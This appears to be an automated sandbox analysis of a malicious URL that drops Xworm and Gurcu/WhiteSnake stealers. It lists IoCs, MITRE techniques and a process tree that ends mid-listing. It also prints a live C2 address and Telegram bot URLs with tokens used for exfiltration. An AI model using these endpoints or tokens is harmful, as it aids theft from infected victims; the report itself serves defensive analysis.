gurcu | hxxp://64[.]7[.]198[.]63/wtc[.]cmd

Analysis

max time kernel
295s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-01-2025 11:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://64.7.198.63/wtc.cmd

Score

10^/10

gurcu xworm collection credential_access defense_evasion discovery execution persistence privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

Version

5.0

154.216.19.12:7000

Mutex

QHMc6qbZcmJeh5Wz

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot7830414956:AAEyqRgiEQW-DV0wawv6-EaJ6kx7dVhrDyc

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot7830414956:AAEyqRgiEQW-DV0wawv6-EaJ6kx7dVhrDyc/sendMessage?chat_id=-4652967507

https://api.telegram.org/bot7833034082:AAHrtbPzgrxV0U2nPIcyRGepQ0loVNSKN94/sendMessage?chat_id=-4563001294

https://api.telegram.org/bot7991608689:AAFUN71TMgyF_fzKFz6tyyBijaijI3s82tk/sendMessage?chat_id=-4563001294

Signatures

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral1/memory/4244-567-0x0000000000B80000-0x0000000000B90000-memory.dmp	family_xworm
behavioral1/files/0x00030000000006dd-950.dat	family_xworm
behavioral1/memory/872-986-0x00000000006B0000-0x00000000006C0000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 5736 created 3520	5736	Guard.exe	56
PID 5736 created 3520	5736	Guard.exe	56
PID 5908 created 3520	5908	Guard.exe	56

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 9 IoCs

flow	pid	Process
34	4488	powershell.exe
36	4488	powershell.exe
55	1856	powershell.exe
56	1856	powershell.exe
61	3112	powershell.exe
83	5440	powershell.exe
84	5440	powershell.exe
85	5636	powershell.exe
86	5636	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 30 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4488	powershell.exe
1856	powershell.exe
5440	powershell.exe
2152	powershell.exe
4800	powershell.exe
5592	powershell.exe
4016	powershell.exe
6120	powershell.exe
2408	powershell.exe
3948	powershell.exe
5660	powershell.exe
1620	powershell.exe
4292	powershell.exe
4852	powershell.exe
5036	powershell.exe
4712	powershell.exe
340	powershell.exe
3112	powershell.exe
5848	powershell.exe
5868	powershell.exe
5636	powershell.exe
4688	powershell.exe
4364	powershell.exe
4324	powershell.exe
2884	powershell.exe
3048	powershell.exe
5932	powershell.exe
2548	powershell.exe
4616	powershell.exe
2884	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	jsc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	betots.exe

Clipboard Data 1 TTPs 6 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2620	cmd.exe
4100	powershell.exe
5228	cmd.exe
6012	powershell.exe
468	cmd.exe
2412	powershell.exe

Drops startup file 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	betots.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	betots.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	bound.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url	cmd.exe

Executes dropped EXE 17 IoCs

pid	Process
2480	wts.exe
3048	winb.exe
4536	winb.exe
5736	Guard.exe
5468	rar.exe
4244	jsc.exe
1356	wts.exe
5908	Guard.exe
2900	winb.exe
5660	winb.exe
2096	rar.exe
4484	xtpxfq.exe
872	betots.exe
4156	xtpxfq.exe
1544	bound.exe
4416	rar.exe
228	notepad.exe

Loads dropped DLL 50 IoCs

pid	Process
4536	winb.exe
4536	winb.exe
4536	winb.exe
4536	winb.exe
4536	winb.exe
4536	winb.exe
4536	winb.exe
4536	winb.exe
4536	winb.exe
4536	winb.exe
4536	winb.exe
4536	winb.exe
4536	winb.exe
4536	winb.exe
4536	winb.exe
4536	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
5660	winb.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe
4156	xtpxfq.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\notepad = "C:\\Users\\Admin\\AppData\\Roaming\\notepad.exe"	betots.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
64	ip-api.com
89	ip-api.com
96	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0009000000023cc4-123.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 9 IoCs

discovery

Process Discovery

T1057

pid	Process
1848	tasklist.exe
4232	tasklist.exe
6080	tasklist.exe
3688	tasklist.exe
384	tasklist.exe
1200	tasklist.exe
4536	tasklist.exe
4380	tasklist.exe
5608	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0009000000023ccc-176.dat	upx
behavioral1/memory/4536-180-0x00007FFD7DEA0000-0x00007FFD7E503000-memory.dmp	upx
behavioral1/files/0x0007000000023cd2-182.dat	upx
behavioral1/files/0x0008000000023cca-184.dat	upx
behavioral1/memory/4536-187-0x00007FFD8E810000-0x00007FFD8E81F000-memory.dmp	upx
behavioral1/memory/4536-186-0x00007FFD85F70000-0x00007FFD85F97000-memory.dmp	upx
behavioral1/files/0x0007000000023cd9-206.dat	upx
behavioral1/files/0x0007000000023cd8-205.dat	upx
behavioral1/files/0x0007000000023cd7-204.dat	upx
behavioral1/files/0x0007000000023cd6-203.dat	upx
behavioral1/files/0x0007000000023cd5-202.dat	upx
behavioral1/files/0x0007000000023cd4-201.dat	upx
behavioral1/files/0x0007000000023cd3-200.dat	upx
behavioral1/files/0x0007000000023cd1-199.dat	upx
behavioral1/files/0x0007000000023ce6-198.dat	upx
behavioral1/files/0x0007000000023ce5-197.dat	upx
behavioral1/files/0x0007000000023ce4-196.dat	upx
behavioral1/files/0x0009000000023ccb-193.dat	upx
behavioral1/files/0x0008000000023cc9-192.dat	upx
behavioral1/memory/4536-225-0x00007FFD86B50000-0x00007FFD86B69000-memory.dmp	upx
behavioral1/memory/4536-224-0x00007FFD86B70000-0x00007FFD86B9B000-memory.dmp	upx
behavioral1/memory/4536-227-0x00007FFD863E0000-0x00007FFD86405000-memory.dmp	upx
behavioral1/memory/4536-229-0x00007FFD85FE0000-0x00007FFD8615F000-memory.dmp	upx
behavioral1/memory/4536-232-0x00007FFD86B30000-0x00007FFD86B49000-memory.dmp	upx
behavioral1/memory/4536-237-0x00007FFD7F330000-0x00007FFD7F863000-memory.dmp	upx
behavioral1/memory/4536-240-0x00007FFD86330000-0x00007FFD86364000-memory.dmp	upx
behavioral1/memory/4536-239-0x00007FFD98350000-0x00007FFD9835D000-memory.dmp	upx
behavioral1/memory/4536-242-0x00007FFD864B0000-0x00007FFD864C4000-memory.dmp	upx
behavioral1/memory/4536-246-0x00007FFD8E5A0000-0x00007FFD8E5AD000-memory.dmp	upx
behavioral1/memory/4536-245-0x00007FFD85F70000-0x00007FFD85F97000-memory.dmp	upx
behavioral1/memory/4536-238-0x00007FFD85200000-0x00007FFD852CE000-memory.dmp	upx
behavioral1/memory/4536-236-0x00007FFD7DEA0000-0x00007FFD7E503000-memory.dmp	upx
behavioral1/memory/4536-251-0x00007FFD85140000-0x00007FFD851F3000-memory.dmp	upx
behavioral1/memory/4536-397-0x00007FFD86B50000-0x00007FFD86B69000-memory.dmp	upx
behavioral1/memory/4536-420-0x00007FFD863E0000-0x00007FFD86405000-memory.dmp	upx
behavioral1/memory/4536-461-0x00007FFD85FE0000-0x00007FFD8615F000-memory.dmp	upx
behavioral1/memory/4536-463-0x00007FFD7F330000-0x00007FFD7F863000-memory.dmp	upx
behavioral1/memory/4536-464-0x00007FFD85200000-0x00007FFD852CE000-memory.dmp	upx
behavioral1/memory/4536-466-0x00007FFD86330000-0x00007FFD86364000-memory.dmp	upx
behavioral1/memory/4536-478-0x00007FFD7DEA0000-0x00007FFD7E503000-memory.dmp	upx
behavioral1/memory/4536-484-0x00007FFD85FE0000-0x00007FFD8615F000-memory.dmp	upx
behavioral1/memory/4536-492-0x00007FFD85140000-0x00007FFD851F3000-memory.dmp	upx
behavioral1/memory/4536-525-0x00007FFD864B0000-0x00007FFD864C4000-memory.dmp	upx
behavioral1/memory/4536-534-0x00007FFD85FE0000-0x00007FFD8615F000-memory.dmp	upx
behavioral1/memory/4536-538-0x00007FFD85200000-0x00007FFD852CE000-memory.dmp	upx
behavioral1/memory/4536-537-0x00007FFD7F330000-0x00007FFD7F863000-memory.dmp	upx
behavioral1/memory/4536-536-0x00007FFD86330000-0x00007FFD86364000-memory.dmp	upx
behavioral1/memory/4536-535-0x00007FFD86B30000-0x00007FFD86B49000-memory.dmp	upx
behavioral1/memory/4536-533-0x00007FFD863E0000-0x00007FFD86405000-memory.dmp	upx
behavioral1/memory/4536-532-0x00007FFD98350000-0x00007FFD9835D000-memory.dmp	upx
behavioral1/memory/4536-531-0x00007FFD86B70000-0x00007FFD86B9B000-memory.dmp	upx
behavioral1/memory/4536-530-0x00007FFD85F70000-0x00007FFD85F97000-memory.dmp	upx
behavioral1/memory/4536-529-0x00007FFD8E810000-0x00007FFD8E81F000-memory.dmp	upx
behavioral1/memory/4536-528-0x00007FFD86B50000-0x00007FFD86B69000-memory.dmp	upx
behavioral1/memory/4536-527-0x00007FFD85140000-0x00007FFD851F3000-memory.dmp	upx
behavioral1/memory/4536-526-0x00007FFD8E5A0000-0x00007FFD8E5AD000-memory.dmp	upx
behavioral1/memory/4536-513-0x00007FFD7DEA0000-0x00007FFD7E503000-memory.dmp	upx
behavioral1/memory/5660-623-0x00007FFD8D500000-0x00007FFD8DB63000-memory.dmp	upx
behavioral1/memory/5660-624-0x00007FFDA1DF0000-0x00007FFDA1E17000-memory.dmp	upx
behavioral1/memory/5660-625-0x00007FFDA6860000-0x00007FFDA686F000-memory.dmp	upx
behavioral1/memory/5660-630-0x00007FFD9D9D0000-0x00007FFD9D9FB000-memory.dmp	upx
behavioral1/memory/5660-631-0x00007FFDA1D60000-0x00007FFDA1D79000-memory.dmp	upx
behavioral1/memory/5660-632-0x00007FFD9CA40000-0x00007FFD9CA65000-memory.dmp	upx
behavioral1/memory/5660-633-0x00007FFD8D380000-0x00007FFD8D4FF000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Guard.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Guard.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 6 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5280	cmd.exe
6060	netsh.exe
4576	cmd.exe
2408	netsh.exe
4828	cmd.exe
2452	netsh.exe

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
5152	timeout.exe
4768	timeout.exe
560	timeout.exe
3296	timeout.exe
4852	timeout.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3188	WMIC.exe
4844	WMIC.exe
5844	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5564	systeminfo.exe
2032	systeminfo.exe
4972	systeminfo.exe

Kills process with taskkill 7 IoCs

evasion

pid	Process
5368	taskkill.exe
5280	taskkill.exe
312	taskkill.exe
6032	taskkill.exe
5668	taskkill.exe
5752	taskkill.exe
5208	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133817614783676373"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1060	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5032	chrome.exe
5032	chrome.exe
4292	powershell.exe
4292	powershell.exe
4292	powershell.exe
340	powershell.exe
340	powershell.exe
340	powershell.exe
4488	powershell.exe
4488	powershell.exe
4488	powershell.exe
4852	powershell.exe
4852	powershell.exe
4852	powershell.exe
4616	powershell.exe
4616	powershell.exe
4616	powershell.exe
2884	powershell.exe
2884	powershell.exe
1856	powershell.exe
1856	powershell.exe
2884	powershell.exe
1856	powershell.exe
3112	powershell.exe
3112	powershell.exe
3112	powershell.exe
4364	powershell.exe
4364	powershell.exe
4364	powershell.exe
4324	powershell.exe
4324	powershell.exe
4800	powershell.exe
4800	powershell.exe
6012	powershell.exe
6012	powershell.exe
6012	powershell.exe
6088	powershell.exe
6088	powershell.exe
4324	powershell.exe
4324	powershell.exe
4800	powershell.exe
4800	powershell.exe
6088	powershell.exe
5736	Guard.exe
5736	Guard.exe
5736	Guard.exe
5736	Guard.exe
5736	Guard.exe
5736	Guard.exe
5592	powershell.exe
5592	powershell.exe
5592	powershell.exe
5784	powershell.exe
5784	powershell.exe
5784	powershell.exe
5736	Guard.exe
5736	Guard.exe
5736	Guard.exe
5736	Guard.exe
5736	Guard.exe
5736	Guard.exe
5736	Guard.exe
5736	Guard.exe
5736	Guard.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
5032	chrome.exe
5032	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeDebugPrivilege	4852	powershell.exe

Suspicious use of FindShellTrayWindow 50 IoCs

pid	Process
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
2480	wts.exe
2480	wts.exe
2480	wts.exe
2480	wts.exe
5736	Guard.exe
5736	Guard.exe
5736	Guard.exe
1356	wts.exe
1356	wts.exe
1356	wts.exe
1356	wts.exe
1356	wts.exe
5908	Guard.exe
5908	Guard.exe
5908	Guard.exe

Suspicious use of SendNotifyMessage 39 IoCs

pid	Process
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
2480	wts.exe
2480	wts.exe
2480	wts.exe
2480	wts.exe
5736	Guard.exe
5736	Guard.exe
5736	Guard.exe
1356	wts.exe
1356	wts.exe
1356	wts.exe
1356	wts.exe
1356	wts.exe
5908	Guard.exe
5908	Guard.exe
5908	Guard.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4244	jsc.exe
872	betots.exe
1544	bound.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5032 wrote to memory of 2032	5032	chrome.exe	83
PID 5032 wrote to memory of 2032	5032	chrome.exe	83
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 1140	5032	chrome.exe	84
PID 5032 wrote to memory of 2080	5032	chrome.exe	85
PID 5032 wrote to memory of 2080	5032	chrome.exe	85
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86
PID 5032 wrote to memory of 2744	5032	chrome.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://64.7.198.63/wtc.cmd
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:5032
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd8dfdcc40,0x7ffd8dfdcc4c,0x7ffd8dfdcc58
    3⤵
    PID:2032
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1980,i,13665676910899697755,15000271213741133251,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1976 /prefetch:2
    3⤵
    PID:1140
- - C:\Program Files\Google\Chrome\Application\chrome.exe
